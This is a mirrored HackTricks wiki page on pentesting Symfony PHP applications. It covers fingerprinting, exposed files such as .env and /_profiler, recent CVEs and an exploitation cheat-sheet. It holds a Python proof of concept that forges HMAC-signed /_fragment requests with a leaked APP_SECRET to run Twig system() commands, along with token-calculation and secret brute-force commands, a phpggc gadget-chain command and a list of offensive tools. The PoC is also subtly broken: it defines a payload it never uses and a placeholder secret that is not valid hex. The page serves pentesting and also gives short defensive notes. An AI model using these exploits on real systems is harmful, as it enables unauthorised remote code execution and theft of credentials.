maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity
hacktricks/src/network-services-pentesting/pentesting-web/symphony.md

129 lines
6.3 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Symfony
{{#include ../../banners/hacktricks-training.md}}
Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application.
> Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**). Always verify the exact minor version because many 2023-2025 security advisories only fixed in patch releases (e.g. 5.4.46 → 5.4.50).
---
## Recon & Enumeration
### Finger-printing
* HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`.
* Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version:
```bash
curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version'
```
* Public routes that only exist on Symfony:
* `/_profiler` (Symfony **Profiler** & debug toolbar)
* `/_wdt/<token>` (“Web Debug Toolbar”)
* `/_error/{code}.{_format}` (pretty error pages)
* `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers)
* Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`.
### Interesting files & endpoints
| Path | Why it matters |
|------|----------------|
| `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys |
| `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic |
| `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces |
| `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) |
| `/_fragment` | Entry point used by ESI/HInclude. Abuse possible once you know `APP_SECRET` |
| `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) |
| `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces |
---
## High-impact Vulnerabilities (2023-2025)
### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”)
* **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed.
* Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig:
```python
# PoC requires the secret
import hmac, hashlib, requests, urllib.parse as u
secret = bytes.fromhex('deadbeef…')
payload = "{{['id']|filter('system')}}" # RCE in Twig
query = {
'template': '@app/404.html.twig',
'filter': 'raw',
'_format': 'html',
'_locale': 'en',
'globals[cmd]': 'id'
}
qs = u.urlencode(query, doseq=True)
token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()
r = requests.get(f"https://target/_fragment?{qs}&_token={token}")
print(r.text)
```
* Excellent write-up & exploitation script: Ambionics blog (linked in References).
### 2. Windows Process Hijack CVE-2024-51736
* The `Process` component searched the current working directory **before** `PATH` on Windows. An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.
* Patched in 5.4.50, 6.4.14, 7.1.7.
### 3. Session-Fixation CVE-2023-46733
* Authentication guard reused an existing session ID after login. If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login.
### 4. Twig sandbox XSS CVE-2023-46734
* In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS.
### 5. Symfony 1 gadget chains (still found in legacy apps)
* `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`. Check file-upload endpoints and `phar://` wrappers.
{{#ref}}
../../pentesting-web/deserialization/php-deserialization-+-autoload-classes.md
{{#endref}}
---
## Exploitation Cheat-Sheet
### Calculate HMAC token for `/_fragment`
```bash
python - <<'PY'
import sys, hmac, hashlib, urllib.parse as u
secret = bytes.fromhex(sys.argv[1])
qs = u.quote_plus(sys.argv[2], safe='=&')
print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest())
PY deadbeef… "template=@App/evil&filter=raw&_format=html"
```
### Bruteforce weak `APP_SECRET`
```bash
cewl -d3 https://target -w words.txt
symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target
```
### RCE via exposed Symfony Console
If `bin/console` is reachable through `php-fpm` or direct CLI upload:
```bash
php bin/console about # confirm it works
php bin/console cache:clear --no-warmup
```
Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request.
---
## Defensive notes
1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config.
2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root.
3. Enforce patch management subscribe to Symfony security advisories and keep at least the LTS patch-level.
4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 or add a `open_basedir`/`disable_functions` defence-in-depth.
---
### Useful offensive tooling
* **ambionics/symfony-exploits** secret-fragment RCE, debugger routes discovery.
* **phpggc** Ready-made gadget chains for Symfony 1 & 2.
* **sf-encoder** small helper to compute `_fragment` HMAC (Go implementation).
## References
* [Ambionics Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment)
* [Symfony Security Advisory CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class)
{{#include ../../banners/hacktricks-training.md}}
Reference in New Issue View Git Blame Copy Permalink